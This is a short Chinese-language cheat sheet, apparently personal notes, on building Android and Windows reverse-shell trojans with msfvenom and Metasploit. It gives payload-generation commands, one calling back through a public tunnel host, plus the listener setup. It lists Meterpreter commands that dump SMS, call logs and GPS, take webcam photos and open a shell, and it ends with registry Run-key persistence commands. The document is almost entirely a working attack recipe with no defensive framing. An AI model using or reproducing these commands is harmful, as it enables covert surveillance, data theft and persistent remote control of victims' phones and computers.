Android #

msfvenom -p payload LHOST=本地地址 LPORT=本地端口 -f 文件类型 -o 木马文件

如

msfvenom -p android -p android/meterpreter/reverse_tcp LHOST=192.168.43.97 LPORT=5555 R> demo.apk

启动msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.134.129
set lport 555
exploit/run

在手机上启动

sysinfo       //查看手机信息
app_list      //查看安装的app
webcam_snap   //拍照
dump_sms      //查看短信
dump_calllog  //通讯录
geolocate     //GPS
screenshot    //jx'py

Win #

msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10189 -f exe -o 123.exe

启动msfconsole

free.idcfengye.com

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost free.idcfengye.com
set lport 1234
run/exploit

等待目标上线

shell     //获取目标shell

win常用

dir     //目录
test    //打印txt
start   // 以默认程序启动，如start 127.0.0.1/a.jpg就是以默认浏览器打开网页
chcp 65001 //解决中文乱码

设置开机自启动

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run" /v shell.exe /d "C:\WINDOWS\system32
" /f

reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run” /v shell.exe /d “C:\WINDOWS\system32 " /f